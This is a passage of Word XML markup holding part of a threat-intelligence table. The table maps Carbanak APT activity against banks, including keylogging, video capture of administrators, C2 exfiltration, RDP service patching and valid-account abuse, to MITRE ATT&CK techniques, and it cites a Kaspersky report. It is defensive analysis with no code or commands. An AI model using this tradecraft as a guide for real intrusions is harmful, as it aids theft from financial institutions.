        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9BF53D" w14:textId="77777777" w:rsidR="00E902FA" w:rsidRPr="003E52D1" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C1C0AB1" w14:textId="79A224B3" w:rsidR="00E902FA" w:rsidRPr="003E52D1" w:rsidRDefault="008F3AB4" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="007D24A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AD2E07F" w14:textId="6339AA55" w:rsidR="00E902FA" w:rsidRDefault="005C5A0F" w:rsidP="00134A75">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00E902FA">
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00E902FA">
              <w:t xml:space="preserve"> logs keystrokes and takes screenshots every 20 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="003E52D1" w14:paraId="0AE8516E" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="333D488B" w14:textId="53375E71" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00DD0816" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5114BA76" w14:textId="1EC17F88" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA0009 Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23422306" w14:textId="42C5F0AE" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8720B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B8720B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1123 </w:t>
            </w:r>
            <w:r w:rsidR="004D3C77">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="004D3C77">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8720B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Audio Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B467512" w14:textId="49F7B2E5" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="004B0529" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="612BCC33" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EDE4978" w14:textId="4D1CD5A5" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19060FDA" w14:textId="6A0AB4F7" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00F54427" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="189AEFA5" w14:textId="19A125C1" w:rsidR="00B707D9" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:r>
              <w:t xml:space="preserve">[1] As part of the attack´s reconnaissance phase, video recordings of the activities of bank employees, particularly system administrators, were made. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="003E52D1" w14:paraId="0FC05C17" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="571B9D29" w14:textId="2151B92C" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00DD0816" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5969161E" w14:textId="0F8B2490" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F827024" w14:textId="617870AF" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8720B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B8720B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1041 </w:t>
            </w:r>
            <w:r w:rsidR="004D3C77">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="004D3C77">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8720B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A14D67E" w14:textId="79E9ADBB" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="004B0529" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5820DDAF" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E44989" w14:textId="663D0B68" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C756934" w14:textId="3ECB4BF3" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00F54427" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F51CA07" w14:textId="5CFCD363" w:rsidR="00B707D9" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:r>
              <w:t>[1] The videos were sent to the C2 server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000138A1" w:rsidRPr="00DD0816" w14:paraId="16B30B03" w14:textId="77777777" w:rsidTr="00433D5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DD25FC2" w14:textId="18E1219E" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AB086EB" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0008 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2134BF83" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD0816">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1021.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD0816">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004B0529">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Remote Services: Remote Desktop Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FA3CBC5" w14:textId="070615B7" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00CE68AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49CD33D6" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="604A688A" w14:textId="3CD9865A" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="00B65B56" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21996122" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-LMV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14301784" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:r w:rsidRPr="00DD0816">
              <w:t xml:space="preserve">[1] To enable connections to the infected computer using the Remote Desktop </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1402E558" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:r w:rsidRPr="00DD0816">
              <w:t xml:space="preserve">Protocol (RDP), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DD0816">
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DD0816">
              <w:t xml:space="preserve"> sets </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DD0816">
              <w:t>Termservice</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DD0816">
              <w:t xml:space="preserve"> service execution mode to Auto. Also, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E2511E5" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:r w:rsidRPr="00DD0816">
              <w:t xml:space="preserve">after executing this service, it modifies the executable code in memory in order to </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F2C6F7B" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:r w:rsidRPr="00DD0816">
              <w:t xml:space="preserve">establish simultaneous work processes for both remote and local users. Modules </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BDB419" w14:textId="77777777" w:rsidR="000138A1" w:rsidRPr="00DD0816" w:rsidRDefault="000138A1" w:rsidP="00433D5B">
            <w:r w:rsidRPr="00DD0816">
              <w:t>modified in this process are: termsrv.dll, csrsrv.dll, msgina.dll and winlogon.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B0529" w:rsidRPr="00B54923" w14:paraId="3249EBD7" w14:textId="77777777" w:rsidTr="00433D5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="385C2E3B" w14:textId="3DD8C89D" w:rsidR="004B0529" w:rsidRPr="00B54923" w:rsidRDefault="004B0529" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="000138A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43665ECE" w14:textId="77777777" w:rsidR="004B0529" w:rsidRPr="00B54923" w:rsidRDefault="004B0529" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0003  Persistence</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="494FE8B7" w14:textId="482F81DE" w:rsidR="004B0529" w:rsidRPr="00B54923" w:rsidRDefault="004B0529" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">1078 </w:t>
            </w:r>
            <w:r w:rsidR="004D3C77">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="004D3C77">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="199F9331" w14:textId="19F6C50F" w:rsidR="004B0529" w:rsidRPr="00B54923" w:rsidRDefault="004B0529" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00CE68AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19DE890F" w14:textId="77777777" w:rsidR="004B0529" w:rsidRPr="00B54923" w:rsidRDefault="004B0529" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="093CB827" w14:textId="77777777" w:rsidR="004B0529" w:rsidRPr="00B54923" w:rsidRDefault="004B0529" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79717061" w14:textId="47C18111" w:rsidR="004B0529" w:rsidRPr="00B54923" w:rsidRDefault="00F54427" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
            <w:r w:rsidR="00A32036">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/NP-LMV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF12CA2" w14:textId="255C6D9E" w:rsidR="004B0529" w:rsidRPr="00B54923" w:rsidRDefault="004B0529" w:rsidP="00433D5B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>attackers abused the aforementioned services by impersonating legitimate local users who had the permissions to perform the actions later reproduced by the cybercriminals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="101"/>
    </w:tbl>
    <w:p w14:paraId="4A7C26F7" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="0077286F" w:rsidRDefault="007A1FAD" w:rsidP="007A1FAD"/>
    <w:p w14:paraId="17EFBA68" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="00C94979" w:rsidRDefault="007A1FAD" w:rsidP="007A1FAD"/>
    <w:p w14:paraId="0610FE9C" w14:textId="77777777" w:rsidR="00CD4802" w:rsidRDefault="007A1FAD" w:rsidP="007D01D9">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidR="007D01D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Carbanak_APT_eng.pdf (kasperskycontenthub.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50629478" w14:textId="2AFF3CB3" w:rsidR="00CD4802" w:rsidRDefault="00343EBF" w:rsidP="00CD4802">
      <w:r>
